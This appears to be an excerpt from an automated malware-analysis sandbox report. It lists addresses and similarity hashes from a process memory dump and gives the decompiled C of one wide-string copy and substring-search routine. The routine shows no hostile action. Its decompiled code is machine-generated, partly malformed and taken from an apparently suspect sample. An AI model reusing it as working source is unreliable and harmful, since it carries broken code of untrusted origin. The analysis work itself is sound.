0x00000000
0x003bbaee
0x003bbf16
0x003bbf1b
0x003bbf1f
0x003bbf21
0x003bbf25
0x00000000
0x003bbf25
0x003bba6d
0x00000000
0x003bb8d2
0x003bb861
0x003bb864
0x003bb867
0x003bb869
0x00000000
0x00000000
0x003bb86b
0x003bb86e
0x003bb86e
0x003bb870
0x003bb870
0x003bb871
0x003bb876
0x003bb87b
0x003bb87d
0x00000000
0x00000000
0x003bb87f
0x003bb883
0x003bb887
0x003bb889
0x00000000
0x00000000
0x00000000
0x003bb889
0x003bb88b
0x00000000
0x003bb88b
0x003bb85b
0x003bb811
0x00000000
0x003bb811
0x003bb783
0x003bb783
0x003bb786
0x003bb7a6
0x003bb7aa
0x003bb7b6
0x003bb7b6
0x003bb7bc
0x003bb7bc
0x003bb7c1
0x003bb7c5
0x003bb7c9
0x003bb7cb
0x00000000
0x00000000
0x003bb7d1
0x003bb7d4
0x003bb7d6
0x00000000
0x00000000
0x003bb7d8
0x003bb7de
0x003bb7f5
0x003bb7f5
0x003bb7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x003bb7e0
0x003bb7e0
0x003bb7e4
0x003bb7e6
0x00000000
0x00000000
0x003bb7ec
0x003bb7ed
0x003bb7f3
0x00000000
0x00000000
0x00000000
0x003bb7f3
0x003bba15
0x003bba15
0x003bba18
0x003bba28
0x003bba1a
0x003bba1c
0x003bba1f
0x003bba1f
0x00000000
0x003bba18
0x003bbf2e
0x003bbf33
0x00000000
0x003bbf33
0x003bb788
0x003bb78a
0x003bb78c
0x00000000
0x00000000
0x003bb793
0x003bb793
0x003bb795
0x003bb795
0x003bb799
0x003bb79b
0x00000000
0x00000000
0x003bb7a1
0x003bb7a2
0x003bb7a4
0x00000000
0x00000000
0x00000000
0x003bb7a4
0x00000000
0x003bb795
0x003bb770
0x00000000
0x003bb770
0x003bb721
0x003bb74a
0x003bb74a
0x003bb74c
0x003bb74d
0x003bb752
0x00000000
0x003bb752
0x003bb723
0x003bb726
0x003bb72b
0x00000000
0x00000000
0x003bb72f
0x003bb72f
0x003bb730
0x003bb735
0x003bb73c
0x00000000
0x00000000
0x003bb73e
0x003bb742
0x003bb748
0x00000000
0x00000000
0x00000000
0x003bb748
0x00000000

Strings

@, xrefs: 003BB760

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction ID: 74486c56e3c54c65ef64dacc0f9bce45ed881613027254e642bc29407c82cba7
Opcode Fuzzy Hash: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction Fuzzy Hash: 92321875A047128BC716CF29C4916BAF2E6BFD4318F15862DEA918BB94EFB4CC41C381

Uniqueness

Uniqueness Score: -1.00%

Function 003BA660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003BA660(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed short** _t227;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				unsigned int _t242;
				signed int _t248;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t260;
				signed int _t263;
				signed int _t264;
				unsigned int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t288;
				signed int _t293;
				signed int _t294;
				signed int _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t309;
				signed int _t312;
				unsigned int _t318;
				signed int _t319;
				signed int _t321;
				signed short* _t323;
				signed int _t324;
				signed int _t325;
				unsigned int _t326;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed short* _t344;
				signed int _t345;
				signed short* _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t356;
				signed int _t362;
				unsigned int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t376;
				signed int _t378;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t403;
				signed int _t404;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				signed int _t418;
				signed int _t421;
				signed int* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t432;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t444;
				void* _t447;

				_t312 = __ecx;
				_t296 = 0;
				_v40 = 0;
				_t398 = __ecx;
				_v36 = 0;
				_push(0x80);
				_t417 = E003B1030();
				_t447 = (_t444 & 0xfffffff0) - 0x34 + 4;
				_t344 = _v40;
				if(_t344 == 0) {
					 *_t417 = 0;
					L8:
					_v36 = 0x40;
					_v40 = _t417;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t417;
						if(_t417 == 0) {
							_t418 = 0x40;
							_t345 = _t296;
							L23:
							_t24 = _t345 + 2; // -2147483652
							_t219 = _t24;
							__eflags = _t219 - 0x40;
							_t220 =  <=  ? 0x40 : _t219;
							__eflags = _t418 - _t220;
							if(_t418 < _t220) {
								_t318 = (_t220 >> 5 >> 0x1a) + _t220 >> 6;
								_t221 = _t220 & 0x8000003f;
								__eflags = _t221;
								if(_t221 < 0) {
									_t221 = (_t221 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t221;
								}
								__eflags = _t221;
								_t319 = _t318 + (_t296 & 0xffffff00 | _t221 > 0x00000000);
								_v64 = _t319 << 6;
								_push(_t319 << 7);
								_v60 = _t345;
								_t224 = E003B1030();
								_t345 = _v60;
								_t421 = _t224;
								_t447 = _t447 + 4;
								_t321 = _v40;
								__eflags = _t321;
								if(_t321 == 0) {
									 *_t421 = _t296;
									goto L36;
								} else {
									__eflags = _t421;
									if(_t421 == 0) {
										L34:
										_push(2);
										_push(_t321);
										_v60 = _t345;
										E003B10B0();
										_t345 = _v60;
										_t447 = _t447 + 8;
										L36:
										_v36 = _v64;
										_v40 = _t421;
										L37:
										 *((short*)(_t421 + _t345 * 2)) = _a8 & 0x0000ffff;
										_t227 =  &_v40;
										 *( *_t227 + 2 + _t345 * 2) = _t296;
										L38:
										_t346 =  *_t227;
										_t422 = _a4;
										if(_t346 == 0) {
											L40:
											_push(0x80);
											 *_t422 = _t296;
											_t422[1] = _t296;
											_t399 = E003B1030();
											_t447 = _t447 + 4;
											_t323 =  *_t422;
											if(_t323 == 0) {
												 *_t399 = _t296;
												L62:
												 *_t422 = _t399;
												_t422[1] = 0x40;
												L63:
												_push(2);
												_push(_v40);
												E003B10B0();
												_v40 = _t296;
												_v36 = _t296;
												return _t422;
											}
											if(_t399 == 0) {
												L46:
												_push(2);
												_push(_t323);
												E003B10B0();
												_t447 = _t447 + 8;
												goto L62;
											}
											_t347 =  *_t323 & 0x0000ffff;
											 *_t399 = _t347;
											if(_t347 == 0) {
												goto L46;
											}
											_t348 = _t296;
											while(1) {
												_t348 = _t348 + 1;
												_t232 =  *(_t323 + _t348 * 4 - 2) & 0x0000ffff;
												 *(_t399 + _t348 * 4 - 2) = _t232;
												if(_t232 == 0) {
													goto L46;
												}
												_t233 =  *(_t323 + _t348 * 4) & 0x0000ffff;
												 *(_t399 + _t348 * 4) = _t233;
												if(_t233 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t234 =  *_t346 & 0x0000ffff;
										if(_t234 != 0) {
											_t324 =  *_t398;
											__eflags = _t324;
											if(_t324 == 0) {
												L54:
												_push(0x80);
												 *_t422 = _t296;
												_t422[1] = _t296;
												_t399 = E003B1030();
												_t447 = _t447 + 4;
												_t325 =  *_t422;
												__eflags = _t325;
												if(_t325 == 0) {
													 *_t399 = _t296;
													goto L62;
												}
												__eflags = _t399;
												if(_t399 == 0) {
													L60:
													_push(2);
													_push(_t325);
													E003B10B0();
													_t447 = _t447 + 8;
													goto L62;
												}
												_t349 =  *_t325 & 0x0000ffff;
												 *_t399 = _t349;
												__eflags = _t349;
												if(_t349 == 0) {
													goto L60;
												}
												_t350 = _t296;
												while(1) {
													_t350 = _t350 + 1;
													_t237 =  *(_t325 + _t350 * 4 - 2) & 0x0000ffff;
													 *(_t399 + _t350 * 4 - 2) = _t237;
													__eflags = _t237;
													if(_t237 == 0) {
														goto L60;
													}
													_t238 =  *(_t325 + _t350 * 4) & 0x0000ffff;
													 *(_t399 + _t350 * 4) = _t238;
													__eflags = _t238;
													if(_t238 != 0) {
														continue;
													}
													goto L60;
												}
												goto L60;
											}
											__eflags =  *_t324 & 0x0000ffff;
											if(( *_t324 & 0x0000ffff) == 0) {
												goto L54;
											}
											_v32 = _t346;
											__eflags = _t234 - 0x41 - 0x19;
											_t239 =  <=  ? _t234 + 0x20 : _t234;
											_t403 = _t296;
											_t240 = ( <=  ? _t234 + 0x20 : _t234) & 0x0000ffff;
											_v48 = _t240;
											while(1) {
												_t425 =  *(_t324 + _t403 * 2) & 0x0000ffff;
												__eflags = _t425 - 0x41 - 0x19;
												_t426 =  <=  ? _t425 + 0x20 : _t425;
												__eflags = ( <=  ? _t425 + 0x20 : _t425) - _t240;
												if(( <=  ? _t425 + 0x20 : _t425) == _t240) {
													break;
												}
												_t403 = _t403 + 1;
												__eflags =  *(_t324 + _t403 * 2) & 0x0000ffff;
												if(( *(_t324 + _t403 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												L53:
												_t422 = _a4;
												_t296 = 0;
												__eflags = 0;
												goto L54;
											}
											_t352 = _v32;
											_t404 = _t324 + _t403 * 2;
											_t422 = _a4;
											_t296 = 0;
											__eflags = _t404;
											if(_t404 == 0) {
												goto L54;
											}
											_t428 = _t352 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_v64 = _t428;
											_t242 = _t428 & 0x00000001;
											_v52 = _t242;
											_v56 =  ~_t428 + 0x10 >> 1;
											_v60 = _t324;
											_v32 = _t352;
											_t432 = _v64;
											_t299 = _v56;
											_t326 = _t242;
											while(1) {
												L70:
												_t353 = _t432;
												__eflags = _t432;
												if(_t432 == 0) {
													goto L76;
												}
												_t251 = 0;
												__eflags = _t326;
												if(_t326 != 0) {
													L80:
													_t333 = _v32;
													while(1) {
														__eflags =  *(_t333 + _t251 * 2) & 0x0000ffff;
														if(( *(_t333 + _t251 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t251 = _t251 + 1;
														__eflags = _t251 - 0x7fffffff;
														if(_t251 < 0x7fffffff) {
															continue;
														}
														_v32 = _t333;
														L84:
														_t251 = 0x7fffffff;
														L85:
														_v68 = _t251;
														_t354 = 0;
														__eflags = 0;
														while(1) {
															_t302 =  *(_t404 + _t354 * 2) & 0x0000ffff;
															_t434 =  *(_v32 + _t354 * 2) & 0x0000ffff;
															__eflags = _t302 - 0x61 - 0x19;
															_t303 =  <=  ? _t302 - 0x20 : _t302;
															_t253 = ( <=  ? _t302 - 0x20 : _t302) & 0x0000ffff;
															__eflags = _t434 - 0x61 - 0x19;
															_t435 =  <=  ? _t434 - 0x20 : _t434;
															__eflags = _t253 - ( <=  ? _t434 - 0x20 : _t434);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t253;
															if(_t253 == 0) {
																L90:
																_t335 = _v60;
																_t296 = 0;
																_t422 = _a4;
																__eflags = _t404;
																if(_t404 == 0) {
																	goto L54;
																}
																_t406 = _t404 - _t335;
																__eflags = _t406;
																_t407 = _t406 >> 1;
																if(_t406 != 0) {
																	_t257 = _t335 & 0x0000000f;
																	__eflags = _t257;
																	if(_t257 == 0) {
																		L106:
																		_t362 =  ~( ~_t257 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t362;
																		while(1) {
																			asm("movdqu xmm1, [ecx+eax*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb ebx, xmm1");
																			__eflags = _t296;
																			if(_t296 != 0) {
																				break;
																			}
																			_t257 = _t257 + 8;
																			__eflags = _t257 - _t362;
																			if(_t257 < _t362) {
																				continue;
																			}
																			_t296 = 0;
																			__eflags = _t362 - 0x7fffffff;
																			if(_t362 >= 0x7fffffff) {
																				L112:
																				_t362 = 0x7fffffff;
																				L113:
																				_t260 = _t362 >> 0x0000001f & _t362;
																				_t365 = _t362 - _t260;
																				__eflags = _t407;
																				if(_t407 < 0) {
																					L115:
																					_t407 = _t365;
																					L116:
																					 *_t422 = _t296;
																					_t336 = _t335 + _t260 * 2;
																					_t422[1] = _t296;
																					__eflags = _t336;
																					if(_t336 == 0) {
																						L151:
																						_push(0x80);
																						_t399 = E003B1030();
																						_t447 = _t447 + 4;
																						_t337 =  *_t422;
																						__eflags = _t337;
																						if(_t337 == 0) {
																							 *_t399 = _t296;
																							goto L62;
																						}
																						__eflags = _t399;
																						if(_t399 == 0) {
																							L157:
																							_push(2);
																							_push(_t337);
																							E003B10B0();
																							_t447 = _t447 + 8;
																							goto L62;
																						}
																						_t366 =  *_t337 & 0x0000ffff;
																						 *_t399 = _t366;
																						__eflags = _t366;
																						if(_t366 == 0) {
																							goto L157;
																						}
																						_t367 = _t296;
																						while(1) {
																							_t367 = _t367 + 1;
																							_t263 =  *(_t337 + _t367 * 4 - 2) & 0x0000ffff;
																							 *(_t399 + _t367 * 4 - 2) = _t263;
																							__eflags = _t263;
																							if(_t263 == 0) {
																								goto L157;
																							}
																							_t264 =  *(_t337 + _t367 * 4) & 0x0000ffff;
																							 *(_t399 + _t367 * 4) = _t264;
																							__eflags = _t264;
																							if(_t264 != 0) {
																								continue;
																							}
																							goto L157;
																						}
																						goto L157;
																					}
																					__eflags =  *_t336 & 0x0000ffff;
																					if(( *_t336 & 0x0000ffff) == 0) {
																						goto L151;
																					}
																					__eflags = _t407;
																					if(_t407 != 0) {
																						L131:
																						_t159 = _t407 + 1; // 0x80000000
																						_t369 = _t159;
																						__eflags = _t369 - 0x40;
																						_t370 =  <=  ? 0x40 : _t369;
																						__eflags = _t370;
																						if(_t370 > 0) {
																							_t270 = (_t370 >> 5 >> 0x1a) + _t370 >> 6;
																							_t371 = _t370 & 0x8000003f;
																							__eflags = _t371;
																							if(_t371 < 0) {
																								_t371 = (_t371 - 0x00000001 | 0xffffffc0) + 1;
																								__eflags = _t371;
																							}
																							__eflags = _t371;
																							_t271 = _t270 + (_t296 & 0xffffff00 | _t371 > 0x00000000);
																							_v64 = _t271 << 6;
																							_push(_t271 << 7);
																							_v60 = _t336;
																							_t273 = E003B1030();
																							_t336 = _v60;
																							_t447 = _t447 + 4;
																							_t376 =  *_t422;
																							__eflags = _t376;
																							if(_t376 == 0) {
																								 *_t273 = _t296;
																								goto L143;
																							} else {
																								__eflags = _t273;
																								if(_t273 == 0) {
																									L141:
																									_push(2);
																									_push(_t376);
																									_v68 = _t273;
																									_v60 = _t336;
																									E003B10B0();
																									_t336 = _v60;
																									_t273 = _v68;
																									_t447 = _t447 + 8;
																									L143:
																									_t422[1] = _v64;
																									 *_t422 = _t273;
																									L144:
																									__eflags = _t273;
																									if(_t273 == 0) {
																										goto L63;
																									}
																									_t378 = _t296;
																									while(1) {
																										_t309 =  *_t336 & 0x0000ffff;
																										_t378 = _t378 + 1;
																										 *_t273 = _t309;
																										__eflags = _t407;
																										if(_t407 == 0) {
																											goto L149;
																										}
																										__eflags = _t378 - _t407;
																										if(_t378 == _t407) {
																											_t296 = 0;
																											 *(_t273 + 2) = 0;
																											goto L63;
																										}
																										L149:
																										__eflags = _t309;
																										if(_t309 == 0) {
																											_t296 = 0;
																											goto L63;
																										}
																										_t273 = _t273 + 2;
																										_t336 = _t336 + 2;
																										__eflags = _t336;
																									}
																								}
																								_t438 =  *_t376 & 0x0000ffff;
																								 *_t273 = _t438;
																								__eflags = _t438;
																								_t422 = _a4;
																								if(_t438 == 0) {
																									goto L141;
																								} else {
																									goto L138;
																								}
																								while(1) {
																									L138:
																									_t296 = _t296 + 1;
																									_t439 =  *(_t376 + _t296 * 4 - 2) & 0x0000ffff;
																									 *(_t273 + _t296 * 4 - 2) = _t439;
																									__eflags = _t439;
																									if(_t439 == 0) {
																										break;
																									}
																									_t440 =  *(_t376 + _t296 * 4) & 0x0000ffff;
																									 *(_t273 + _t296 * 4) = _t440;
																									__eflags = _t440;
																									if(_t440 != 0) {
																										continue;
																									}
																									break;
																								}
																								_t422 = _a4;
																								_t296 = 0;
																								__eflags = 0;
																								goto L141;
																							}
																						}
																						_t273 = _t296;
																						goto L144;
																					}
																					_t382 = _t336 & 0x0000000f;
																					__eflags = _t382;
																					if(_t382 == 0) {
																						L124:
																						_t407 =  ~( ~_t382 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t407;
																						while(1) {
																							asm("movdqu xmm1, [ecx+edx*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb eax, xmm1");
																							__eflags = _t260;
																							if(_t260 != 0) {
																								break;
																							}
																							_t382 = _t382 + 8;
																							__eflags = _t382 - _t407;
																							if(_t382 < _t407) {
																								continue;
																							}
																							__eflags = _t407 - 0x7fffffff;
																							if(_t407 >= 0x7fffffff) {
																								L130:
																								_t407 = 0x7fffffff;
																								goto L131;
																							} else {
																								goto L128;
																							}
																							while(1) {
																								L128:
																								__eflags =  *(_t336 + _t407 * 2) & 0x0000ffff;
																								if(( *(_t336 + _t407 * 2) & 0x0000ffff) == 0) {
																									goto L131;
																								}
																								_t407 = _t407 + 1;
																								__eflags = _t407 - 0x7fffffff;
																								if(_t407 < 0x7fffffff) {
																									continue;
																								}
																								goto L130;
																							}
																							goto L131;
																						}
																						asm("bsf edi, eax");
																						_t407 = (_t407 >> 1) + _t382;
																						goto L131;
																					}
																					_t407 = _t296;
																					__eflags = _t382 & 0x00000001;
																					if((_t382 & 0x00000001) != 0) {
																						goto L128;
																					}
																					_t382 =  ~_t382 + 0x10 >> 1;
																					__eflags = _t382;
																					while(1) {
																						_t260 =  *(_t336 + _t407 * 2) & 0x0000ffff;
																						__eflags = _t260;
																						if(_t260 == 0) {
																							goto L131;
																						}
																						_t407 = _t407 + 1;
																						__eflags = _t407 - _t382;
																						if(_t407 < _t382) {
																							continue;
																						}
																						goto L124;
																					}
																					goto L131;
																				}
																				__eflags = _t407 - _t365;
																				if(_t407 <= _t365) {
																					goto L116;
																				}
																				goto L115;
																			} else {
																				goto L110;
																			}
																			while(1) {
																				L110:
																				__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																				if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																					goto L113;
																				}
																				_t362 = _t362 + 1;
																				__eflags = _t362 - 0x7fffffff;
																				if(_t362 < 0x7fffffff) {
																					continue;
																				}
																				goto L112;
																			}
																			goto L113;
																		}
																		_t363 = _t296;
																		_t296 = 0;
																		asm("bsf edx, edx");
																		_t362 = (_t363 >> 1) + _t257;
																		goto L113;
																	}
																	_t362 = 0;
																	__eflags = _t257 & 0x00000001;
																	if((_t257 & 0x00000001) != 0) {
																		goto L110;
																	}
																	_t257 =  ~_t257 + 0x10 >> 1;
																	__eflags = _t257;
																	while(1) {
																		__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																		if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t362 = _t362 + 1;
																		__eflags = _t362 - _t257;
																		if(_t362 < _t257) {
																			continue;
																		}
																		_t296 = 0;
																		__eflags = 0;
																		goto L106;
																	}
																	_t296 = 0;
																	goto L113;
																}
																_push(0x80);
																 *_t422 = 0;
																_t422[1] = 0;
																_t399 = E003B1030();
																_t447 = _t447 + 4;
																_t338 =  *_t422;
																__eflags = _t338;
																if(_t338 == 0) {
																	 *_t399 = 0;
																	goto L62;
																}
																__eflags = _t399;
																if(_t399 == 0) {
																	L98:
																	_push(2);
																	_push(_t338);
																	E003B10B0();
																	_t447 = _t447 + 8;
																	goto L62;
																}
																_t386 =  *_t338 & 0x0000ffff;
																 *_t399 = _t386;
																__eflags = _t386;
																if(_t386 == 0) {
																	goto L98;
																}
																_t387 = 0;
																while(1) {
																	_t387 = _t387 + 1;
																	_t280 =  *(_t338 + _t387 * 4 - 2) & 0x0000ffff;
																	 *(_t399 + _t387 * 4 - 2) = _t280;
																	__eflags = _t280;
																	if(_t280 == 0) {
																		goto L98;
																	}
																	_t281 =  *(_t338 + _t387 * 4) & 0x0000ffff;
																	 *(_t399 + _t387 * 4) = _t281;
																	__eflags = _t281;
																	if(_t281 != 0) {
																		continue;
																	}
																	goto L98;
																}
																goto L98;
															}
															_t354 = _t354 + 1;
															__eflags = _t354 - _v68;
															if(_t354 < _v68) {
																continue;
															}
															goto L90;
														}
														_t356 = _t404 + 2;
														__eflags = _t356;
														if(_t356 == 0) {
															goto L53;
														}
														__eflags =  *(_t404 + 2) & 0x0000ffff;
														if(( *(_t404 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v44 = _t404;
														_t255 = 0;
														__eflags = 0;
														while(1) {
															_t255 = _t255 + 1;
															_t404 = _v44 + _t255 * 2;
															_t331 =  *_t404 & 0x0000ffff;
															__eflags = ( *(_t356 + _t255 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t332 =  <=  ? _t331 + 0x20 : _t331;
															__eflags = ( <=  ? _t331 + 0x20 : _t331) - _v48;
															if(( <=  ? _t331 + 0x20 : _t331) == _v48) {
																break;
															}
															__eflags =  *(_t356 + _t255 * 2) & 0x0000ffff;
															if(( *(_t356 + _t255 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t432 = _v64;
														_t299 = _v56;
														_t326 = _v52;
														goto L70;
													}
													_v32 = _t333;
													L163:
													__eflags = _t251;
													if(__eflags == 0) {
														goto L84;
													}
													if(__eflags > 0) {
														goto L85;
													}
													goto L90;
												}
												_t441 = _v32;
												_t353 = _t299;
												while(1) {
													__eflags =  *(_t441 + _t251 * 2) & 0x0000ffff;
													if(( *(_t441 + _t251 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t251 = _t251 + 1;
													__eflags = _t251 - _t299;
													if(_t251 < _t299) {
														continue;
													}
													_v32 = _t441;
													_t326 = _v52;
													goto L76;
												}
												_v32 = _t441;
												goto L163;
												L76:
												_t300 = _v32;
												_t248 =  ~( ~_t353 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t248;
												while(1) {
													asm("movdqu xmm1, [ebx+edx*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb ecx, xmm1");
													__eflags = _t326;
													if(_t326 != 0) {
														break;
													}
													_t353 = _t353 + 8;
													__eflags = _t353 - _t248;
													if(_t353 < _t248) {
														continue;
													}
													_v32 = _t300;
													__eflags = _t248 - 0x7fffffff;
													if(_t248 >= 0x7fffffff) {
														goto L84;
													}
													goto L80;
												}
												asm("bsf eax, eax");
												_v32 = _t300;
												_t251 = (_t326 >> 1) + _t353;
												goto L163;
											}
										}
										goto L40;
									}
									_t283 =  *_t321 & 0x0000ffff;
									 *_t421 = _t283;
									__eflags = _t283;
									if(_t283 == 0) {
										goto L34;
									}
									_v68 = _t398;
									_t284 = _t296;
									while(1) {
										_t284 = _t284 + 1;
										_t414 =  *(_t321 + _t284 * 4 - 2) & 0x0000ffff;
										 *(_t421 + _t284 * 4 - 2) = _t414;
										__eflags = _t414;
										if(_t414 == 0) {
											break;
										}
										_t415 =  *(_t321 + _t284 * 4) & 0x0000ffff;
										 *(_t421 + _t284 * 4) = _t415;
										__eflags = _t415;
										if(_t415 != 0) {
											continue;
										}
										break;
									}
									_t398 = _v68;
									goto L34;
								}
							}
							_t421 = _v40;
							goto L37;
						}
						_t288 = _t417 & 0x0000000f;
						__eflags = _t288;
						if(_t288 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t395 =  ~( ~_t288 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t395;
							while(1) {
								asm("movdqu xmm1, [esi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								__eflags = _t312;
								if(_t312 != 0) {
									break;
								}
								_t288 = _t288 + 8;
								__eflags = _t288 - _t395;
								if(_t288 < _t395) {
									continue;
								}
								__eflags = _t395 - 0x7fffffff;
								if(_t395 >= 0x7fffffff) {
									L22:
									_t418 = 0x40;
									_t345 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t417 + _t395 * 2) & 0x0000ffff;
									if(( *(_t417 + _t395 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t395 = _t395 + 1;
									__eflags = _t395 - 0x7fffffff;
									if(_t395 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L64:
								__eflags = _t345 - 0xfffffffe;
								if(_t345 != 0xfffffffe) {
									_t418 = 0x40;
								} else {
									 *_t417 = _t296;
									_t418 = _v36;
								}
								goto L23;
							}
							asm("bsf edx, ecx");
							_t345 = (_t395 >> 1) + _t288;
							goto L64;
						}
						_t395 = _t296;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							goto L20;
						}
						_t288 =  ~_t288 + 0x10 >> 1;
						__eflags = _t288;
						while(1) {
							_t312 =  *(_t417 + _t395 * 2) & 0x0000ffff;
							__eflags = _t312;
							if(_t312 == 0) {
								goto L64;
							}
							_t395 = _t395 + 1;
							__eflags = _t395 - _t288;
							if(_t395 < _t288) {
								continue;
							}
							goto L16;
						}
						goto L64;
					}
					_t227 =  &_v40;
					goto L38;
				}
				if(_t417 == 0) {
					L6:
					_push(2);
					_push(_t344);
					E003B10B0();
					_t447 = _t447 + 8;
					goto L8;
				}
				_t293 =  *_t344 & 0x0000ffff;
				 *_t417 = _t293;
				if(_t293 == 0) {
					goto L6;
				}
				_t294 = 0;
				while(1) {
					_t294 = _t294 + 1;
					_t312 =  *(_t344 + _t294 * 4 - 2) & 0x0000ffff;
					 *(_t417 + _t294 * 4 - 2) = _t312;
					if(_t312 == 0) {
						goto L6;
					}
					_t312 =  *(_t344 + _t294 * 4) & 0x0000ffff;
					 *(_t417 + _t294 * 4) = _t312;
					if(_t312 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x003ba660
0x003ba66c
0x003ba66e
0x003ba672
0x003ba674
0x003ba678
0x003ba682
0x003ba684
0x003ba687
0x003ba68d
0x003ba6c7
0x003ba6ca
0x003ba6ce
0x003ba6d6
0x003ba6dc
0x003ba6e7
0x003ba6e9
0x003bae6d
0x003bae72
0x003ba76d
0x003ba772
0x003ba772
0x003ba775
0x003ba778
0x003ba77b
0x003ba77d
0x003ba792
0x003ba795
0x003ba795
0x003ba79a
0x003ba7a2
0x003ba7a2
0x003ba7a2
0x003ba7a3
0x003ba7aa
0x003ba7b4
0x003ba7b8
0x003ba7b9
0x003ba7bd
0x003ba7c2
0x003ba7c6
0x003ba7c8
0x003ba7cb
0x003ba7cf
0x003ba7d1
0x003ba819
0x00000000
0x003ba7d3
0x003ba7d3
0x003ba7d5
0x003ba804
0x003ba804
0x003ba806
0x003ba807
0x003ba80b
0x003ba810
0x003ba814
0x003ba81c
0x003ba820
0x003ba824
0x003ba828
0x003ba82c
0x003ba830
0x003ba836
0x003ba83b
0x003ba83b
0x003ba83d
0x003ba842
0x003ba84b
0x003ba84b
0x003ba850
0x003ba852
0x003ba85a
0x003ba85c
0x003ba85f
0x003ba863
0x003ba8a0
0x003ba94a
0x003ba94a
0x003ba94c
0x003ba953
0x003ba953
0x003ba955
0x003ba959
0x003ba961
0x003ba967
0x003ba974
0x003ba974
0x003ba867
0x003ba890
0x003ba890
0x003ba892
0x003ba893
0x003ba898
0x00000000
0x003ba898
0x003ba869
0x003ba86c
0x003ba871
0x00000000
0x00000000
0x003ba873
0x003ba875
0x003ba875
0x003ba876
0x003ba87b
0x003ba882
0x00000000
0x00000000
0x003ba884
0x003ba888
0x003ba88e
0x00000000
0x00000000
0x00000000
0x003ba88e
0x00000000
0x003ba875
0x003ba844
0x003ba849
0x003ba8a8
0x003ba8aa
0x003ba8ac
0x003ba8f5
0x003ba8f5
0x003ba8fa
0x003ba8fc
0x003ba904
0x003ba906
0x003ba909
0x003ba90b
0x003ba90d
0x003ba947
0x00000000
0x003ba947
0x003ba90f
0x003ba911
0x003ba93a
0x003ba93a
0x003ba93c
0x003ba93d
0x003ba942
0x00000000
0x003ba942
0x003ba913
0x003ba916
0x003ba919
0x003ba91b
0x00000000
0x00000000
0x003ba91d
0x003ba91f
0x003ba91f
0x003ba920
0x003ba925
0x003ba92a
0x003ba92c
0x00000000
0x00000000
0x003ba92e
0x003ba932
0x003ba936
0x003ba938
0x00000000
0x00000000
0x00000000
0x003ba938
0x00000000
0x003ba91f
0x003ba8b1
0x003ba8b3
0x00000000
0x00000000
0x003ba8b5
0x003ba8bc
0x003ba8c2
0x003ba8c5
0x003ba8c7
0x003ba8ca
0x003ba8ce
0x003ba8ce
0x003ba8d5
0x003ba8db
0x003ba8de
0x003ba8e1
0x00000000
0x00000000
0x003ba8e7
0x003ba8ec
0x003ba8ee
0x00000000
0x00000000
0x003ba8f0
0x003ba8f0
0x003ba8f3
0x003ba8f3
0x00000000
0x003ba8f3
0x003ba992
